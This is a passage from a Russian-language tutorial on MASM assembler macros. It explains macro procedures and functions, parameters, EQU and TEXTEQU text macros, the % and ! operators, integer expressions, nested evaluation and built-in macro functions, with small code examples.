именно так, но вам должна быть понятна суть). Встретив макроопределение, препроцессор
не проверяет, а есть ли макро с таким же именем. Это значит, что макро можно
переопределять.MyMacro macro echo Это макро 1 endm MyMacro macro echo Это макро 2 endm MyMacroВы можете самостоятельно удалять макроопределения, из памяти препроцессора
используя директиву PURGE:PURGE macronameЭта директива удаляет тело макроопределения, однако не удаляет имя макро из
таблицы имён. Таким образом, в данном случае:MyMacro macro mov eax,ebx endm PURGE MyMacro ;; После этой директивы, MyMacro эквивалентен: ;; MyMacro macro ;; endm ;; Определению пустого макро. MyMacro ;; Ничего не произойдёт.Разработчики ML задумывали эту директиву для разрешения конфликтов
между файлами с множеством макросов, однако мне совершенно не ясно как ей можно
воспользоваться.
Если вы хотите получить эффект «удаления» макро, лучше применять следующий
метод:<Имя макро, который нужно «удалить»> macro
.ERR <Попытка вызова макро, который не существует>
endmВ этом случае при попытке воспользоваться таким макро, компилятор выдаст
ошибку, и вы будете проинформированы о его вызове, что намного лучше неведения.
Поэтому просто запомните: «Не нужно использовать директиву PURGE».Конечно же, использование макро не было бы столь полезным, если бы макро
не имел формальных параметров. При вызове макро, препроцессор заменяет все
имена
формальных параметров
их непосредственными значениями в теле макроопределения. Список формальных
параметров разделяется запятой, и может иметь вид:MyMacro macro param0, param1:REQ, param2 := <0>,param3:VARARGЗдесь:
Param0 – пример определения параметра.
Param1:REQ – ключевое слово REQ указывает на то, что этот параметр обязательный.
То есть, если он не будет указан, вы получите ошибку этапа компиляции.
Param2:=<0> – пример параметра, который имеет значение по умолчанию.
То есть если этот параметр не будет указан при вызове макро, он будет равен
этому значению.Заметьте, что при вызове макро параметр может быть не определён:
MyMacro param1,,param3Значение второго параметра неопределенно.
Param3:vararg – становится именем параметра, который воспринимает всё остальное
как строку. При этом запятые между параметрами так же попадают в строку, а
значит число параметров макроса в принципе неограниченно.Ограничениям являются особенности архитектуры компилятора.
Так, например, компилятор имеет ограничение на длину логической строки,
которая равна 512 байтам.Конечно же, после параметра с директивой vararg не возможно объявить другие
параметры.Обратите внимание, что если при определении формального
параметра в макро нет директивы – он считается необязательным параметром.
Более подробно о вызове макро и значении параметров я расскажу далее.
Пример:
Так что же происходит с формальными параметрами?
Посмотрите, как работает препроцессор ML:MyMacro macro param1,param2 mov eax, param1 mov ebx, param2 endm MyMacro var, 1231. Препроцессор берёт текст внутри макро, и заменяет
в нём все
слова param1, param2, на их значения:
«
mov eax, var
mov ebx, 123
»2. Полученный текст вставляет на место вызова макро, и передаёт компилятору.
Вот интересно, а что будет если:
MyMacro macro param1,param2 MyMacro2 macro param1 mov eax, param1 mov ebx, param2 endm endm MyMacro var, 123Можно различать два вида макро – макропроцедуры и макрофункции.
В официальном руководстве MASM различается четыре основных
вида макро.
Text macros – текстовый макрос
Macro procedures – макро-процедура
Repeat blocks – блок повторения
Macro functions – макро-функция
Однако автор считает, что разделение макро на два вида – лучше систематизирует
материал, и отражает суть темы.Макрофункции в отличие от макропроцедур могут возвращать результат, и получают
список формальных параметров в скобках, подобно функциям в С. Например:mov eax,@GetModuleHandle()
Заметьте, что к макрофункции невозможно обратится как к макро, вы всегда должны
заключать формальные параметры макрофункции между «()», иначе MASM не будет
распознавать её как макрофункцию:mov eax,@GetModuleHandle
error A2148: invalid symbol type in expression : @GetModuleHandleПрепроцессор MASM анализирует текст макроопределения на наличие директивы
exitm, и помечает макрос как макрофункцию.Ключевое слово exitm <retval>, аналогично оператору return в C++, выполнение
макро заканчивается, и возвращается необязательный параметр retval. Этот параметр
– строка, которую должен вернуть макрос.
Если в макро директива EXITM употребляется без параметров:
EXITM
То препроцессор считает, что это макропроцедура, а не макрофункция.
Если в макроопределении есть два вида EXITM с параметром и без, то ML выдаст
ошибку о недопустимом использовании директивы EXITM.
EXITM <>
EXITM
: error A2126: EXITM used inconsistently
Это подчёркивает тот факт, что макрофункцией считается только макро, который
возвращает значение (хотя бы пустое), а директива EXITM без параметров
не возвращает никакого значения, что недопустимо в макрофункции.Таким образом, окончательно будем считать, что макро, которые не возвращают
значение – это макропроцедуры, а макро, которые возвращают значение
(хотя бы пустую строку) – это макрофункции.;####################################################### @GetModuleHandle macro Invoke GetModuleHandle,0 exitm endm .code ; Это макрофункция так нельзя @GetModuleHandle ;;– ошибка ; Так можно @GetModuleHandle() ;######################################################## @GetModuleHandle macro Invoke GetModuleHandle,0 endm .code ; Это макрос. Так правильно @GetModuleHandle ; Так можно, но всё равно это вызывает ошибку ? ; warning A4006: too many arguments in macro call @GetModuleHandle() ; Это макро, а не макрофункция так нельзя!!! mov eax,@GetModuleHandle ; И так нельзя mov eax,@GetModuleHandle() ;########################################################Что касается директивы endm, которая заканчивает каждое макроопределение,
в руководстве написано, что при помощи неё так же можно указать возвращаемый
параметр:
endm <retvalue>
Однако на практике это не так. ? Очень странно, хотя об этом чётко написано
в руководстве.Заметьте, что макропроцедура может быть вызвана только в начале строки:
@GetModuleHandle
;; Но не так:
mov eax,@MyMacroМакрофункция может быть вызвана в любых выражениях:
;; Так:
mov eax,@GetModuleHandle()
;; И так:
@FunMacro()
;; И так:
@GetModuleHandle() EQU eaxIII.1. Функционирование макросов
Чтобы строить макросы, важно понимать, как они работают, и как их обрабатывает
MASM. Давайте рассмотрим типичный макро, и этапы его обработки.MyMacro macro param1,param2,param3:VARARG echo param1 echo param2 echo param3 endm MyMacro Параметр 1, Параметр 2, Параметр 3, Параметр 4 ;; Вывод -=-=-=-=-=-=-=-= Параметр 1 Параметр 2 Параметр 3,Параметр 41. Компилятор встречает лексему MyMacro
2. Он проверяет, содержится ли эта лексема в словаре ключевых слов
3. Если нет, то он проверяет, содержится ли эта лексема в списке макросов.
4. Если да, он передаёт текст, содержащийся в макро препроцессору. Препроцессор
заменяет все вхождения формальных параметров в этом тексте на их значения.
В данном случае мы имеем:echo Параметр 1
echo Параметр 2
echo Параметр 3,Параметр 45. Препроцессор возвращает компилятору обработанный текст, который после компилируется.
Обратите внимание на пункт 4 и 5. Они ключевые. Очень часто при работе с макроопределениями
появляются ошибки из-за неверного понимания порядка генерирования макро текста.
Например:PROGRAM_IMAGE_BASE EQU 400000h FunMacro macro exitm <Параметр 3,параметр 4> endm MyMacro macro param1,param2,param3:VARARG echo param1 echo param2 echo param3 endm MyMacro PROGRAM_IMAGE_BASE, FunMacro(),Параметр 5А теперь самостоятельно опишите порядок действий компилятора при вызове этого
макро. Запишите его себе куда-нибудь, так чтобы сравнить, и смотрите на вывод:PROGRAM_IMAGE_BASE
Параметр 3, Параметр 4
Параметр 5Прежде чем объяснять действительный порядок, я оговорюсь, что директива echoникогда не обрабатывает определённые константы, такие как PROGRAM_IMAGE_BASE.
Это утверждение справедливо даже тогда, когда перед директивой echo стоит
оператор %, который может раскрывать только текстовые макроопределения.
То есть выражение:echo FunMacro()Даст результат:
FunMacro()Теперь, когда мы немного порассуждали можно привести тот текст, который генерируется
из макро:echo PROGRAM_IMAGE_BASE
echo Параметр 3, Параметр 4
echo Параметр 5Это означает следующее:
- При вызове макро, значение формальных параметров воспринимается как
текст, и передаётся в макро как строка.- Исключение составляют лишь макрофункции, результат выполнения которых
вычисляется и присваивается значению параметра.Специальный оператор % заставляет ассемблер вычислять текстовую строку,
следующую за ним, и только потом подставлять в правое выражение.
Например, если мы
перепишем макровызов так:MyMacro %PROGRAM_IMAGE_BASE, FunMacro,Параметр 5
То получим вывод:
4194304 ;; Значение PROGRAM_IMAGE_BASE
Параметр 3, Параметр 4
Параметр 5Давайте рассмотрим ещё один пример, который хорошо показывает, как работает
макро. Например, вы определили макропроцедуру (именно его, а не макрофункцию).
То когда вы пишите такое:@Macro что-то, что придёт вам в голову [символ возврата каретки]Что делает препроцессор ML:
1. Считывает всю строку до символа возврата каретки;
2. Смотрит, как вы определили параметры в макро;
3. Сканирует строку на наличие символа «,» или «<», «>»;
Вам может показаться странным, но препроцессору всё равно,
какие символы идут во время вызова макро. То есть вы можете вызвать макро
так:@MyMacro Привет, это кириллица в файле, и ML не будет на неё ругаться
или
@MyMacro `!@#$%^&*(){}[]Посмотрите как СИльно (от буквы CИ)
будет выглядеть макро в MASM:MyMacro{Это что С++?}
MyMacro[Нет, это MASM]4. Назначает формальным параметрам (любого типа, кроме VARARG) макро участки
строк, которые были определены разделителями запятыми (предварительно очистив
от хвостовых и начальных пробелов, если только строка не была определена в
угловых кавычках <>);5. Если макро содержит формальный параметр типа VARARG, то ML сперва
инициализирует значениями (согласно пункту 4) обычные формальные параметры,
и только потом
назначает параметру типа VARARG (который может быть только один в
конце списка параметров) всю строку до конца.
Если вы пишите макровызов как
@Macro Param1 , Param2
То значение параметров будут:
param1 = «Param1»
param2 = «Param2»
Если вы хотите передать сами значения строк, то должны заключит их в угловые
кавычки:
@Macro < Param1 >,< Param2 >6. Препроцессор разрешает все вызовы макрофункций, если они есть в лексемах
параметра, и присваивает их результат соответствующему параметру. Если лексему
в строке параметра предваряет символ %, то он вычисляет её значение до того,
как передаст строку внутрь макро.
Благодаря именно такому порядку:
1. Разделение строки на макропараметры
2. Поиск и Вызов макрофункций в значениях макропараметров
3. Присвоение результатов соответствующему макропараметрув следующем случае:
MyMacro macro param1,param2,param3 echo param1 endm -------------------------------------- FunMacro macro param:VARARG exitm param endm MyMacro FunMacro(param1, param2, param3) OUT: param1, param2, param3 --------------------------------------строка, возращаемая макрофункцией присваивается параметру param1, а не
param2, param3Теперь вы в состоянии объяснить следующую ситуацию:
MyMacro macro … endm MyMacro() Предупреждение при компиляции: : warning A4006: too many arguments in macro callКак нужно было бы изменить этот макро (именно макро, а не макрофункцию), чтобы
предупреждение не выдавалось? А почему оно происходит?Если вы с лёгкостью ответили на этот вопрос, значит, материал усвоен, иначе
советую ещё раз прочитать его, и ответить на следующий вопрос.Как должен понять компилятор следующий код:
MyMacro macro param1 param1 endm MyMacro = 2Естественно отвечать на этот вопрос вы должны без помощи компилятора (то есть
проверить компиляцией). Если вы не можете ответить на этот вопрос, или неуверенны
в верности ответа, я поменяю задание:MyMacro macro param1 echo param1 endm MyMacro = 2Запустите его в ML. Если и теперь вы сомневаетесь – перечитайте этот пункт
снова и снова, продолжая экспериментировать.III.2. Определение макро переменных и строк
Я бы назвал следующее:
Param = 0
Constant EQU 123
WASM EQU <One Wonderful Wonderful ASM>
WASM_RU TEXTEQU <http://www.wasm.ru>макропеременными (с тем фактом, что переменная может иметь константный тип).
В терминологии MASM:
WASM EQU <One Wonderful Wonderful ASM>
WASM_RU TEXTEQU <http://www.wasm.ru> ;; Такие определения называются текстовыми макро. ;; В этой статье вы встретите два варианта определенийПотому что под термином «переменная» понимается:
var dd 123Переменные являются частью программы, а макропеременные живут только на
этапе компиляции. По сути, они есть более простым видом макроопределений, и
поэтому их стоит понимать как специальные макро, которые так же раскрываются
препроцессором.Макропеременная может иметь только три типа – целочисленная макропеременная
INEGER4 (dword), целочисленная макроконстанта или текстовой макро (строковая
макропеременная).Автор считает значительным упущением отсутствия возможности
определять тип макропеременной. Это очень сильно ограничивает возможности
макропрепроцессора. Но что поделать.При чём, в зависимости от вида определения макропеременной ML считает, что:
Param = 0 ;; Param – это целочисленная макропеременная Constant EQU 123 ;; Макроконстанта
;; Текстовой макро (Макропеременная строкового типа)
;; (Это не так в руководстве MASM)
Var EQU qwer
;; Текстовой макро (Макропеременная строкового типа)
WASM EQU <One Wonderful Wonderful ASM>
;; Текстовой макро (Макропеременная строкового типа)
WASM_RU TEXTEQU <http://www.wasm.ru>Как вы уже догадались, каждое макроопределение обладает своими свойствами
и возможностями.
- Целочисленная макропеременная. Имеет тип INT (dword). Может участвовать
во всех арифметических выражениях MASM. Как переменная она может изменять
своё значение.- Макроконстанта может иметь целочисленное значение. Её значение не может
быть повторно изменено.- Текстовой макро может быть любой строкой не более 255 символов. Поскольку
он имеет статус переменной, его значение может быть изменено.А теперь подробнее. Если с целочисленными макропеременными в достаточной степени
ясно. То с определениями EQU полный бардак.Как и в случае с вызовами макро, автор попытается построить алгоритм анализа
EQU выражений:1. Анализируем правую часть. В анализе правой части препроцессор выделяет
лексемы, которые классифицирует как числа, строки. Так, например, в выражении:qqqq EQU 1234567890 string1 23456789012390 macrofun()«1234567890» – это лексема число, а «string1» – это строка, «macrofun()» –
это всё равно строка (а не макрофункция!!!).
Именно по этому такое определение будет давать ошибку:
qqqq EQU 156n7
: error A2048: nondigit in number2. Если правая часть является верным определением числа в MASM, то есть 123
или 123h или 0101b – выполнить шаг три, иначе шаг четыре.
Обратите внимание, что числа с плавающей запятой в этом случае
считаются строкой.Такое поведение связано с внутренней организацией препроцессора ML,
который просто «не понимает» чисел с плавающей запятой, и не умеет
с ними работать.То есть тип макропеременной Float:
Float EQU 1.2345будет не числовой, а строковой
3. Если полученное число имеет значение, не превышающее диапазон значений
для dword – это целочисленная макроконстанта.
Если правая часть для EQU является верным числом более 25 символов,
выдаётся ошибка:
: error A2071: initializer magnitude too large for specified sizeПри чём такая ошибка появляется даже в том случае, если выражение содержит
другие символы через пробел:qqqq EQU 1234567890123456789012390 dfdgЭто объясняется действиями в пункте 1, когда ML анализирует лексемы.
Кроме того, если числовая лексема не соответствует правилам определения
чисел в ML, то есть в середине числа появляется символ A-Z, либо другие
символы, не входящие в разряд разделителей – то такая лексема порождает
ошибку, даже если она содержит число большее dword диапазона.4. Иначе – это строковая макропеременная.
Теперь попробуйте самостоятельно определить тип макроопределения:
qqqq EQU 0x123234
qqqq EQU 123234h
qqqq EQU 012323
qqqq EQU 0.123234
qqqq EQU 123234 342
qqqq EQU 4294967296В данном примере только второй и третий вариант – макроконстанта, остальные
– текстовые макро. Последний вариант таким не является, так как превышает диапазон
значений для dword.Замете, что поскольку препроцессор в правой части выделяет корректные выражения,
правая часть не может состоять из недопустимых символов. Но при этом она может
состоять из директивы определения литерала: «<>» – угловых кавычек.Директива <текст> – определяет литерал, таким образом, указывая препроцессору
ML, что он должен воспринимать нечто как строку символов. При этом сами «<>»
– в строку не попадают. Директива <> – является единственной директивой
для препроцессора ML, которая определяет литералы.Именно по этой причине, все виды кавычек – двойные, одинарные,
` – вот такие одинарные, воспринимаются как простые символы, и как следствие
проходят к значениям параметров макро. То есть, например:
MyMacro “Привет, это строка в двойных кавычках”
MyMacro ‘Привет, это строка в одинарных кавычках’
MyMacro `Привет, это строка в специальных кавычках`
MyMacro «Привет, это строка»‘И это’И замете, что во всех случаях кавычки так же попадают в значения формального
параметра макро. Вы можете использовать этот факт, например, для того,
чтобы менять поведение макро, в зависимости от типа кавычек обрамляющих
строку.Кроме директивы, определяющей литерал, препроцессор ML имеет свой ESC-символ
(символ отмены). В отличие от С этот символ – «!». Он отменяет
действие других символов (<, >, «, ‘, %, ; , а так же символ запятой),
которые могут иметь функциональность в том, или ином выражении. Если вы хотите
получить «!»,
вы должны использовать последовательность «!!».К сожалению, не обходится без проблем и с символом отмены «!». Восстановить
точный алгоритм работы мне не удалось. Единственное, что возможно – это
привести несколько
примеров с непонятными эффектами при его использовании:literal EQU <!> ;; Пустая строка
;; Ошибка – ;;: error A2045: missing angle bracket or brace in literal
literal EQU <!!>
;; Один символ «!»
literal EQU <!!!!>
;; Не имеют эффекта
literal EQU <Привет!" fgd!">
literal EQU <Привет" fgd">
;; Один символ «>»
literal EQU <!!!>> ;; literal = «>»
literal EQU <Текст!!!>> ;; literal = «Текст>»
;; Хотя при вызове макро, «!» ведёт себя нормально
;; а так же он ведёт себя нормально в директиве TEXTEQU
Char <Текст!>>Вывод – не пользуйтесь директивой EQU для определения литералов, для этого
есть другая директива – TEXTEQU.Для директивы TEXTEQU алгоритм несколько отличен от алгоритма EQU, так как
в TEXTEQU обрабатывается правое выражение на наличие символа %. То есть
вы можете
определить этот код:literal TEXTEQU %FunMacro()Или
literal TEXTEQU %(10-5)*30 ;; literal = “150”На самом деле как вы видите, внутренняя работа TEXTEQU значительно отличается
от EQU <>. Видимо по этому разработчики ML решили её ввести.В руководстве MASM32 написано:
———————————————————————————————
The TEXTEQU directive acts like the EQU directive with text equates but
performs macro substitution at assembly and does not require angle brackets.
The TEXTEQU directive will also resolve the value of an expression preceded
by a percent sign (%). The EQU directive does not perform macro substitution
or expression evaluation for strings.
———————————————————————————————Теперь вы должны понимать, что это не совсем так. Является ли это ошибкой
разработчиков ML? Видимо да. В частности EQU не должна была переводить
в статус переменных литералов определения типа:NOLITERAL EQU db
И конструкция ниже должна была бы вызывать ошибку:
literal EQU db literal EQU dwНо ошибка не появляется, более того значение literal меняется на dw
В заключении к этому пункту, вы должны осознать, что тип определений невозможно
изменить. То есть переменная не может стать целочисленной константой:literal EQU string
literal EQU 123 ;; Это текстовой макроВторое переопределение символа literal, не изменит его тип на тип целочисленной
константы.Думаю, у Вас возник вопрос:
– Что такое? Недокументированные возможности MASM?У меня есть веские основания считать это ничем иным, как
ошибкой разработчиков. Давайте предположим, что все макропеременные хранятся
компилятором в памяти в виде массива структур. Не вдаваясь в подробности,
пусть эта
структура будет такая:macrodefine struct type dd ? ;; тип макроконстанты value dd ? endsКак видно из структуры, значение макроконстанты может быть только dword’ом.
Если это строка, то в поле value может быть записан указатель на строку
(например, ASCIIZ).Поле type может принимать только два значения, которое описывает тип
value: либо value – содержит числовое значение макропеременной (константы).Если определяется числовая константа то, вызывается одна функция (назовём
её setmacrodefine_val()), которая добавляет в таблицу макроконстанту.Это конечно предположение. И в действительности всё может быть ещё
проще или ещё сложнее. Однако вероятность того, что свойства макропеременных
хранятся именно подобным образом близка к единице. Теперь если
вы немного подумаете, то поймёте:string EQU <string> ;; Строковая макропеременная string TEXTEQU string ;; Строковая макропеременная string EQU string ;; Должна была быть константойПоследний случай записывается в таблицу, как строковая макропеременная
по той простой причине, что string не может быть записано в поле value,
а поле type не имеет специального значения, чтобы указать, что value – это константный указатель на строку (помните C++?).В конце концов, совершенно не важно угадал ли автор причину,
или нет. Важно другое – что ошибка достаточно явная. А, кроме того, так
и
не была исправлена
до сих пор (версия 7.0). Зато теперь вы сможет с пониманием отнестись к таким
неожиданным эффектам.Видимо разработчики не задумываются о том, что кто-то будет использовать
определения MASM, иначе, нежели это написано в руководстве. И кому-то взбредёт
в голову
проверить, а можно ли переопределить EQU.А подумайте, к каким бы серьёзным неуловимым ошибкам произвела бы эта
халатность, если бы на MASM писали сложные приложения. Но как видно
их никто не пишет.Свои особенности имеют так же целочисленные выражения с оператором «=». В
таких выражениях перед их выполнением осуществляется полная замена всех макроконстант,
макропеременных на их значения, и вызов всех макрофункций.Как вы думаете, что будет в следующем примере:
literal EQU Something
literal = 1234Варианты ответа:
- Произойдёт ошибка переопределения константы.
- literal = 1234.
Второй вариант ответа мы должны откинуть сразу, потому что в этом пункте
чётко определили, что данное переопределение невозможно. Первый вариант
ответа больше
похож на правду.… Однако не соответствует истине. Что же произошло? А
произошло следующее:
- Препроцессор нашёл лексемы «literal» и «1234».
- Обнаружил, что «literal» является текстовым макро, и именно поэтому
выполнил замену лексемы «literal» на её строковое значение.- Проанализировал строку: «Something = 1234».
Этот факт может быть легко доказан, следующим тестом:
literal EQU Something literal = 1234 %echo @CatStr(%Something) ============================ Вывод: 1234Если вас сбил с толку этот пример, не отчаивайтесь. Всё дело в том, что препроцессор
ML в разных выражениях по-разному заменяет макропеременные. Вот об этом мы
и поговорим в следующем пункте.А пока подумайте, что должно случится в этом примере:
num EQU number
num EQU 123
num = 1234На этом можно было бы закончить данный пункт, если бы не одна особенность
использования строк в вызове макро. А точнее приоритет анализа кавычек и директивы
определения литерала <>. Не смотря на описанный выше алгоритм поведения
макро, оказывается, что препроцессор при вызове макро выполняет определение
литерала в кавычках, но что самое интересное, как было отмечено, выше сами
кавычки попадают в строку. Если вам нужно передать макро одиночную кавычку
вы должны воспользоваться символом отмены «!». Однако самое неприятное таится
в том, что символы «<>» и кавычки конкурируют между собой в определениях
строк. Например, попробуйте сказать, что должно было бы получиться в этом случае:%echo @CatStr(<Раз">,<"Два>)
OUT:
Раз">,<"ДваА можно было бы подумать, что ML должен принять операторы <> и запятую.
Данное место – источник многих сложно обнаруживаемых ошибок. Например:FORC char,<str>
m$__charcode = @InStr (1,<@ABCDEFGHIJKLMNOPQRSTUVWXYZ>,<char>)
…Если в строке попадается символ кавычки, а макропеременная char заменяется
на значение кавычки, имеем:m$__charcode = @InStr (1,<@ABCDEFGHIJKLMNOPQRSTUVWXYZ>,<”>)В этом случае мы получаем ошибку:
missing single or double quotation mark in stringТак и должно быть, потому что кавычки имеют высший приоритет анализа, чем
оператор <>. Более того, угловые кавычки <> имеют самый низкий
приоритет по отношению ко всем спец. символам, что согласуется с MASM Reference.
Посмотрите на Дополнение к статье: пункт 3.a.i, который подозрительно выделен
«жирным». В частности, следующее выражение, которое работает без проблем:TEXT TEXTEQU <"> ;; Это работает?
TEXT TEXTEQU <;> ;; И это???Появляется закономерный вопрос: для чего символ отмены «!»?
Данный пример демонстрирует скрытые глубины анализатора ML. А точнее его архитектурное
несовершенство. Так как выражения с TEXTEQU как видно обрабатываются отдельной
функцией, которая проверяет в первую очередь наличие угловых скобок «<>».
Все другие выражения ML обрабатываются другой стандартной функцией, которая
была написана задолго до появления TEXTEQU.Замечательная наука всем программистам, которая демонстрирует,
во что выливается халатность архитектора при дальнейших попытках расширения
продукта.Зато благодаря TEXTEQU пример с поиском символа в строке имеет решение:
m$__char TEXTEQU <char>
m$__charcode = @InStr (1,<@ABCDEFGHIJKLMNOPQRSTUVWXYZ>,%m$__char)Единственно, отчего не может помочь данный код – это от вылавливания в строке
символов «> или <». Для этого можно использовать специальную проверку
в условных блоках на наличие символа «>», но при этом придётся отказаться
от микроблока FORC.III.3. Обработка выражения в MASM
MASM обрабатывает выражения в правой и левой части в зависимости от контекста.
Там, где вам необходима предварительная обработка выражений, используется оператор
«%». Он заставляет препроцессор ML сначала вычислить выражение
после оператора
% (то есть выражение в правой части относительно %), и только
потом продолжить анализ всей строки. Например, если вы хотите, чтобы при вызове
макро:num TEXTEQU <123>
FunMacro numмакропараметр был бы равен не строке «num», а значению текстового макро num,
вы должны поставить оператор % перед num. Например:FunMacro %num
;;или
FunMacro %(1+2*num)Но и с оператором % не всё гладко.
Оказывается препроцессор ML, различает два (фактически три) вида выражений, в
которых используется оператор %. Первый вид выражений – Арифметические:Все выражения, содержащие операторы +,-,*, а так же сдвиговые и битовые
операцииСтроковые выражения:
Все выражения результат вычисления которых – строка.
Примеры:
;Арифметические выражения
%(num shl 3)
%num = 2134 shl 3 + 2*6
;Всё равно арифметическое выражение
%(num shl 3 @CatStr(num))
;Строковое выражение
%(@CatStr(num shl 3))
;Строковое выражение
%PROGRAM IMAGEТак вот что интересно.
В арифметических выражениях происходит полная замена правой части: вызовы
макрофункций, значение макроконстант, макропеременных любых типов, как
строковых, так и целочисленных.
Так же в левой части выражения: замена строковых макропеременных, и вызов
макрофункций.То есть:
Левая часть = Правая часть
(Вызвать все макрофункции, и заменить все строковые макропеременные) =
(Вызвать все макрофункции, и заменить все строковые и целочисленные макропеременные
и константы)В строковых выражениях происходит замена только строковых макропеременных
(текстовых макро) (замете, что в ML нет строковых макроконстант). Это значит
что в случае:%echo PROGRAM_IMAGE_BASE
Появится: «PROGRAM_IMAGE_BASE», а не его числовое значение.
Однако есть и третий частный случай, когда оператор % относится только к
одному литералу:%literal
В этом случае происходит полный комплекс подстановок:
- Вызываются макрофункции.
- Заменяются все макропеременные или макроконстанты.
Например:
FunMacro %literal
Значение literal будет подставлено в вызов макро, в независимости от того,
какой тип имеет literal.
Выдержка их руководства MASM:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
temp TEXTEQU %(SIZEOF array / LENGTHOF array)
% ECHO Bytes per element: tempNote that you cannot get the same results simply by putting the % at
the beginning of the first echo line, because % expands only text macros,
not numeric equates or constant expressions.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Следует так же отметить, что в выражениях с exitm оператор % работает
точно
так же, как с выражениями в TEXTEQU.III.4. Целочисленные выражения MASM
Целочисленные, побитовые операции так же необходимы разработчику макроопределений.
Они дают возможность скрыть обработку битовых полей, или вычисление сложных
выражений. Например, как это сделано в макрофункции $$$MAKELANGID.$$$MAKELANGID macro p:REQ,s:REQ
m$__langid = (s SHL 10) or p
EXITM <m$__langid>
endmВы всегда должны помнить, что препроцессор MASM не различается знаковые и
беззнаковые числа (подобно тому, как это делает x86), и значение числа
не может выходить
за диапазон dword. Препроцессор MASM не выдаёт предупреждений при переполнении.
Следующий пример демонстрирует такое поведение:myint = 0ffffffffh myint = myint + 1 ;; myint = 0 %echo @CatStr(%myint) ================================= OUT: 0 ;; Ещё один пример с умножением: myint = 0ffffffffh ;; ;; 0ffffffffh * 2 = (dword)1FFFFFFFEh = 4294967294 myint = myint * 2 %echo @CatStr(%myint) ================================= OUT: 4294967294В следующей статье мы поговорим про то, как работать с 64-bits макропеременными,
используя данный факт.Ниже приводится список операций, которые могут участвовать в целочисленных
выражениях MASM.
Оператор Пример Описание AND res = op1 AND op2 Операция логического «И» над каждым битом операндов op1 и op2. OR res = op1 OR op2 Операция логического «ИЛИ» над каждым битом операндов op1, op2 NOT res = NOT op1 Операция логического «НЕ» над каждым битом операнда op1 XOR res = op1 XOR op2 Операция XOR между операндами op1, op2 SHL res = op1 SHL count Выполняет побитовый сдвиг влево (наподобие команды x86 shl) операнда
op1, на количество бит, указанное в операнде count.SHR res = op1 SHL count Выполняет побитовый сдвиг вправо операнда op1, на число бит, указанное
в операнде count.+,-,*,/ Основные математические операции MOD res = op1 MOD op2 Возвращает остаток от деления операнда op1 на операнд op2 [] res = op1[op2] Операция: «Смещение». Выполняет сложение операндов op1 и op2 III.5. Вычисление рекурсивных выражений
Теперь, когда мы рассмотрели правила анализа и вычисления выражений в MASM,
остаётся раскрыть важный вопрос: «Как происходит анализ выражений, если
они
состоят из других выражений?».Обычно это называется короче: вложенные выражения.
Вложенное выражение – это такое выражение, элементы
которого сами являются выражениями, которые так же могут иметь
вложенность.Замороченное определение, похожее на «Иди туда, не знаю куда,
возьми то, не знаю что» – пример старинной народной русской рекурсии,
которая так часто встречается в нашей жизни.)
Например, вызов макрофункции при вызове макро – это вложенное выражение:
MyMacro FunMacro(Мой парамерт) ;;Или это: %echo FunMacro(Мой параметр) ;;Или это: MyMacro FunMacro(Fun2(Привет))Вложенность характеризуется параметром количества уровней вложенности. В недавнем
примере уровень вложенности был равен двум. При чём вызов Fun2() можно называть
выражением низшего уровня вложенности, а вызов макро MyMacro – выражением верхнего
уровня.После анализа выражений, и получения их многоуровневой структуры вложенности,
препроцессор начинает вычислять результат выражения самого низшего уровня.
Потом подставляет его результат в выражение следующего уровня, и так далее.Например, для случая:
Fun2 macro param
exitm <MyCount = param>
endm
FunMacro(Fun2(%(12+34)))Порядок вычислений такой:
- %(12+34) = 46
- Fun2(46)
- FunMacro(MyCount = 46)
- Результат выполнения FunMacro(MyCount = 46)
А иначе препроцессор не смог бы. Если бы он начал вычисления
выражений с верхнего уровня, то это то же самое, как если бы он попытался
выполнить народную русскую рекурсию:
«Пойди туда, не знаю куда…, вычисли то, не знаю что»
или
FunMacro(???)То есть: Вложенные выражения вычисляются последовательно от низшего уровня
к верхнему, и результаты вычисления каждого уровня становятся материалом для
выражений следующего уровня.Это правило называется рекурсивным вычислением выражений. Оно используется
везде, кроме мест вычисления значений макропараметров при вызове макро
(как макросов,
так и макрофункций). В этом случае действует правило: результат вложенного
выражения присваивается макропараметру и не анализируется повторно. Это
значит, что в данном
примере:myvar EQU <123> MyMacro macro param1,param2,param3 echo param1 endm FunMacro macro param:VARARG exitm <param> endm MyMacro FunMacro(var,@CatStr(<%>,myvar),var4)вывод будет таким:
var,myvar,var4То есть препроцессор не будет снова вычислять выражение для второго макропараметра
функции FunMacro(). Если бы он сделал это, то тогда вывод был бы таким, как
в этом случае:%echo FunMacro(var,@CatStr(<%>,myvar),var4)
Вывод:
var,123,var4Теперь, когда вы знаете все тонкости вычисления выражений в MASM, настало
время рассмотреть Встроенные макрофункции и директивы, которые участвуют в
этих выражениях.III.6. Встроенные макрофункции и директивы
Несмотря на то, что этот пункт не касается самих макросов в MASM, он необходим,
для того, чтобы строить макросы, и манипулировать выражениями, возникающими
внутри макросов.MASM обладает несколькими встроенными макрофункциями, макропеременными и
макроконстантами, которые работают так, как если бы они были макро, определённые
вами. Вот список
этих предопределений:
Имя макроопределения, его тип Описание
Определения Даты и Времени @Date,
текстовое макроопределение (не макрофункция)Возвращает строку вида MM/ДД/ГГ
Где:
MM – месяц, две цифры
ДД – день, две
цифры
ГГ – год, две цифры@Time,
текстовое макроопределение (не макрофункция)Возвращает текущее время в 24-х часовом формате вида ЧЧ:ММ:СС
ЧЧ – часы,
два числа
ММ – минуты, два числа
СС – секунды, два числаИнформация об окружении @Cpu, числовая макроконстанта Битовая маска, определяющая режим работы процессора. Никакой информации
о полях этой маски нет.@Environ(env), макрофункция Возвращает строковое значение переменной среды окружения. Например:
%echo @Environ(TEMP)Вывод: F:Tempasm
@Interface, целочисленная макроконстанта Информация о языковых параметрах вызова. @Version, строковая макроконстанта Возвращает версию ML.
Например:
%echo Version = @Version Вывод: Version = 614Или 615 в MASM 6.15Информация о файле @FileCur, строковая макропеременная Возвращает имя файла и путь к нему (если есть), так как был подан этот
файл в командной строке компилятору ML.Пример:
%echo FileCur = @FileCur Вывод: FileCur = .start.asm@FileName, строковая макропеременная Возвращает имя файла, без его расширения. То есть для модуля start.asm:
%echo FileName = @FileName Вывод:FileName = START@Line, целочисленная макроконстанта Возвращает номер текущей строки в файле.
Пример:
%echo Line = @CatStr(%@Line) Вывод:Line = 31Строковые макрофункции @CatStr( string1 [[, string2…]] ), макрофункция Возвращает строку, созданную объединением строк параметров функции.
Пример:
